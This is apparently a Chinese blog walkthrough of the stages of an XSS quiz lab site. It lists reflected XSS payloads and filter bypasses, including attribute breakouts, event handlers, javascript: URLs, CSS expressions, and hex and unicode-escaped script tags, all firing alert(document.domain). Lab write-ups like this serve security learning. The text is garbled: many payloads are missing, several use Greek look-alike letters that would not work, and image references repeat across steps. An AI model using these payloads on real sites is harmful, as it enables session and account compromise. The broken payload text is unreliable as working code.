28、XSS常见payload

简介: 28、XSS常见payload

环境:http://xss-quiz.int21h.jp

一、Stage #1 无过滤xss漏洞

1、随便输入字符:123

0a2653c851af460fa595bd959398a8f1.png

2、输入payload:

0eacb84100b54626af849e6b562bf92a.png

3、弹出对话框,说明存在xss漏洞

2d65d23f6d4748949b924e4057485923.png

二、Stage #2 属性中的xss漏洞

1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中

4cebaac233b3433da32a72337a77fc60.png

2、重新构造payload,先闭合标签:

">

6de278e6d6694ce5bb08e7e842b7e74b.png

或者 "οnmοuseοver=alert(document.domain)>

7a399525ddec4b77923c464820b33738 (1).png

3、成功弹出

7a399525ddec4b77923c464820b33738.png

三、Stage #3 选择列表框中的xss漏洞

1、点击search,抓包

0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png

2、修改post数据,添加payload:,发送到repeater,send

2d65d23f6d4748949b924e4057485923.png

3、右击响应信息,show response in browser,复制到浏览器打开

2e9b90b2ca334476abebe75bafe6eeaa.png 4cebaac233b3433da32a72337a77fc60.png 6de278e6d6694ce5bb08e7e842b7e74b.png

四、隐藏提交参数的xss漏洞

">

1、随便输入字符,search,抓包

0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png

2、在隐藏参数后面添加payload,forward,查看审查元素

2d65d23f6d4748949b924e4057485923.png 2e9b90b2ca334476abebe75bafe6eeaa.png

3、闭合参数,重新构造payload:">,发包,成功弹出

4cebaac233b3433da32a72337a77fc60.png

五、HTML事件中的xss漏洞

1、直接输入payload:">,审查元素,字符被转义了,

0a2653c851af460fa595bd959398a8f1.png

2、重新构造payload:"οnmοuseοver=“alert(document.domain)

或者” οnclick=“alert(document.domain)”

3、成功弹出

0eacb84100b54626af849e6b562bf92a.png

六、空格分隔属性中的xss漏洞

1、随便输入字符111 222 333

4cebaac233b3433da32a72337a77fc60.png

2、输入字符串

6de278e6d6694ce5bb08e7e842b7e74b.png

3、构造payload:111 οnclick=alert(document.domain),成功弹出

7a399525ddec4b77923c464820b33738 (1).png

七、JavaScript为协议触发

1、输入payload:javascript:alert(document.domain),成功弹出

0a2653c851af460fa595bd959398a8f1.png

八、绕过过滤xss漏洞

1、输入payload:">,审查元素,domain被过滤了

0eacb84100b54626af849e6b562bf92a.png

2、重新构造payload:">

2d65d23f6d4748949b924e4057485923.png

2e9b90b2ca334476abebe75bafe6eeaa.png

九、绕过替换script和on事件的xss漏洞

1、输入,script被替换成xscript

0a2653c851af460fa595bd959398a8f1.png

2、闭合payload,并修改100" οnmοuseοver="alert(document.domain)

0eacb84100b54626af849e6b562bf92a.png

on事件,被替换成onxxx

3、使用伪协议加“ ”绕过

100"> xss

十、利用IE特性绕过过滤",可以闭合双引号,οnmοusemοve=alert(document.domain)

仅针对IE浏览器

十一、利用css特性绕过过滤",IE低版本

background-color:#f00;background:url(“javascript:alert(document.domain);”);

2d65d23f6d4748949b924e4057485923.png

十二、利用css执行js

xss:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})

2e9b90b2ca334476abebe75bafe6eeaa.png

十三、十六进制绕过过滤

1、输入

0a2653c851af460fa595bd959398a8f1.png

2、<>都被转义了,用十六进制代替

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

0eacb84100b54626af849e6b562bf92a.png 2d65d23f6d4748949b924e4057485923.png

十四、unicode绕过过滤

1、输入\x3c \x3e,不能绕过

0a2653c851af460fa595bd959398a8f1.png

2、重新利用unicode构造payload:

\u003cscript\u003ealert(document.domain);\u003c/script\u003e

0eacb84100b54626af849e6b562bf92a.png 2d65d23f6d4748949b924e4057485923.png

禁止非法,后果自负

目录
相关文章
|
6月前
|
移动开发 JavaScript 前端开发
分享一些XSS Payload
分享一些XSS Payload
110 0
|
安全 前端开发 JavaScript
28、XSS常见payload
28、XSS常见payload
446 0
28、XSS常见payload
|
前端开发 JavaScript
XSS payload 大全
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL link link link Hello Hello link link link link Hello link Hello link link link ...
1736 0
|
Web App开发 安全
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 `XSS Payload` 以及从攻击者的角度来初探 XSS 攻击的威力。
3054 0
|
安全 JavaScript Web App开发
|
4月前
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
2月前
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
127 1
|
26天前
|
存储 JavaScript 安全
|
26天前
|
存储 JavaScript 前端开发
Xss跨站脚本攻击(Cross Site Script)
Xss跨站脚本攻击(Cross Site Script)
|
4月前
|
SQL 安全 数据库
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!
【7月更文挑战第26天】在 Python Web 开发中, 安全性至关重要。本文聚焦 SQL 注入、XSS 和 CSRF 这三大安全威胁,提供实战防御策略。SQL 注入可通过参数化查询和 ORM 框架来防范;XSS 则需 HTML 转义用户输入与实施 CSP;CSRF 防御依赖 CSRF 令牌和双重提交 Cookie。掌握这些技巧,能有效加固 Web 应用的安全防线。安全是持续的过程,需贯穿开发始终。
83 1
Python Web开发者必学:SQL注入、XSS、CSRF攻击与防御实战演练!